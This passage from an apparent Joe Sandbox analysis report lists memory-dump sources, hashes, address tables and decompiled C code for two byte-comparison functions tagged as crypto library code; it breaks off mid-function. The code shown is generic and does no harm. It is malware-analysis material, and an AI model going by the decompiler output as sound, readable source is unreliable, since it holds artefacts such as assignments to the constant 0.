                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a267
                  0x0042a1c5
                  0x0042a1c7
                  0x0042a1de
                  0x0042a1e6
                  0x0042a1e8
                  0x0042a1ff
                  0x0042a207
                  0x0042a209
                  0x0042a220
                  0x0042a228
                  0x0042a22a
                  0x0042a237
                  0x0042a237
                  0x00000000
                  0x0042a22a
                  0x0042a216
                  0x0042a21a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a21a
                  0x0042a1f5
                  0x0042a1f9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a1f9
                  0x0042a1d4
                  0x0042a1d8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a12f
                  0x0042a12f
                  0x0042a132
                  0x0042a136
                  0x0042a138
                  0x0042a14f
                  0x0042a14f
                  0x0042a153
                  0x0042a157
                  0x0042a159
                  0x0042a170
                  0x0042a170
                  0x0042a174
                  0x0042a178
                  0x0042a17a
                  0x0042a191
                  0x0042a191
                  0x0042a195
                  0x0042a199
                  0x0042a19b
                  0x0042a1a1
                  0x0042a1a4
                  0x0042a1a8
                  0x0042a1a8
                  0x00000000
                  0x0042a19b
                  0x0042a180
                  0x0042a183
                  0x0042a187
                  0x0042a18b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a18b
                  0x0042a15f
                  0x0042a162
                  0x0042a166
                  0x0042a16a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a16a
                  0x0042a13e
                  0x0042a141
                  0x0042a145
                  0x0042a149
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a149
                  0x00429940
                  0x00429940
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction ID: b05f44079d24200c9591e7e17f82823a4ec95cd84189ee831702fce5a720de00
                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction Fuzzy Hash: A7D1B1B3E0A9B34A8736812D505813BEA626FD176035FC3E2CCD43F389D22B9D6195D4
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00429D1B, Relevance: .4, Instructions: 361COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00429D1B(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}






























                  0x00429d1b
                  0x00429d1b
                  0x00429d21
                  0x00429da0
                  0x00429da2
                  0x00429da4
                  0x00000000
                  0x00000000
                  0x00429daa
                  0x00429db0
                  0x00429e2f
                  0x00429e31
                  0x00429e33
                  0x00000000
                  0x00000000
                  0x00429e39
                  0x00429e3f
                  0x00429ebe
                  0x00429ec0
                  0x00429ec2
                  0x00000000
                  0x00000000
                  0x00429ec8
                  0x00429ece
                  0x00429f4d
                  0x00429f4f
                  0x00429f51
                  0x00000000
                  0x00000000
                  0x00429f57
                  0x00429f5d
                  0x00429fdc
                  0x00429fde
                  0x00429fe0
                  0x00000000
                  0x00000000
                  0x00429fec
                  0x0042a06c
                  0x0042a06e
                  0x0042a070
                  0x00000000
                  0x00000000
                  0x0042a076
                  0x0042a07c
                  0x0042a0fb
                  0x0042a0fd
                  0x0042a0ff
                  0x00000000
                  0x00000000
                  0x0042a10d
                  0x0042a10f
                  0x0042a120
                  0x0042a120
                  0x00429d15
                  0x0042aa71
                  0x0042aa71
                  0x0042a085
                  0x0042a087
                  0x0042a09e
                  0x0042a0a6
                  0x0042a0a8
                  0x0042a0bf
                  0x0042a0c7
                  0x0042a0c9
                  0x0042a0e0
                  0x0042a0e8
                  0x0042a0ea
                  0x0042a0f7
                  0x0042a0f7
                  0x00000000
                  0x0042a0ea
                  0x0042a0d6
                  0x0042a0da
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a0da
                  0x0042a0b5
                  0x0042a0b9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a0b9
                  0x0042a094
                  0x0042a098
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a098
                  0x00429ff6
                  0x00429ff8
                  0x0042a00f
                  0x0042a017
                  0x0042a019
                  0x0042a030
                  0x0042a038
                  0x0042a03a
                  0x0042a051
                  0x0042a059
                  0x0042a05b
                  0x0042a068
                  0x0042a068
                  0x00000000
                  0x0042a05b
                  0x0042a047
                  0x0042a04b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a04b
                  0x0042a026
                  0x0042a02a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a02a
                  0x0042a005
                  0x0042a009
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042a009
                  0x00429f66
                  0x00429f68
                  0x00429f7f
                  0x00429f87
                  0x00429f89
                  0x00429fa0
                  0x00429fa8
                  0x00429faa
                  0x00429fc1
                  0x00429fc9
                  0x00429fcb
                  0x00429fd8
                  0x00429fd8
                  0x00000000
                  0x00429fcb
                  0x00429fb7
                  0x00429fbb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429fbb
                  0x00429f96
                  0x00429f9a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429f9a
                  0x00429f75
                  0x00429f79
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429f79
                  0x00429ed7
                  0x00429ed9
                  0x00429ef0
                  0x00429ef8
                  0x00429efa
                  0x00429f11
                  0x00429f19
                  0x00429f1b
                  0x00429f32
                  0x00429f3a
                  0x00429f3c
                  0x00429f49
                  0x00429f49
                  0x00000000
                  0x00429f3c
                  0x00429f28
                  0x00429f2c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429f2c
                  0x00429f07
                  0x00429f0b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429f0b
                  0x00429ee6
                  0x00429eea
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429eea
                  0x00429e48
                  0x00429e4a
                  0x00429e61
                  0x00429e69
                  0x00429e6b
                  0x00429e82
                  0x00429e8a
                  0x00429e8c
                  0x00429ea3
                  0x00429eab
                  0x00429ead
                  0x00429eba
                  0x00429eba
                  0x00000000
                  0x00429ead
                  0x00429e99
                  0x00429e9d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429e9d
                  0x00429e78
                  0x00429e7c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429e7c
                  0x00429e57
                  0x00429e5b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429e5b
                  0x00429db9
                  0x00429dbb
                  0x00429dd2
                  0x00429dda
                  0x00429ddc
                  0x00429df3
                  0x00429dfb
                  0x00429dfd
                  0x00429e14
                  0x00429e1c
                  0x00429e1e
                  0x00429e2b
                  0x00429e2b
                  0x00000000
                  0x00429e1e
                  0x00429e0a
                  0x00429e0e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429e0e
                  0x00429de9
                  0x00429ded
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429ded
                  0x00429dc8
                  0x00429dcc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429d23
                  0x00429d23
                  0x00429d26
                  0x00429d2a
                  0x00429d2c
                  0x00429d43
                  0x00429d43
                  0x00429d47
                  0x00429d4b
                  0x00429d4d
                  0x00429d64
                  0x00429d64
                  0x00429d68
                  0x00429d6c
                  0x00429d6e
                  0x00429d85
                  0x00429d85
                  0x00429d89
                  0x00429d8d
                  0x00429d8f
                  0x00429d95
                  0x00429d98
                  0x00429d9c
                  0x00429d9c
                  0x00000000
                  0x00429d8f
                  0x00429d74
                  0x00429d77
                  0x00429d7b
                  0x00429d7f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429d7f
                  0x00429d53
                  0x00429d56
                  0x00429d5a
                  0x00429d5e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429d5e
                  0x00429d32
                  0x00429d35
                  0x00429d39
                  0x00429d3d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429d3d
                  0x00429940
                  0x00429940
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction ID: d2496cc9752ec4f49cc3a33794e1cb84df1cf8f33cfb87970b3baee92ab4ddb5
                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction Fuzzy Hash: FCC1BFB3E1A9B30A8736812D516822BEE626FC176075FC3E6CCD43F389D62B5D4096D4
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00429947, Relevance: .4, Instructions: 351COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00429947(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
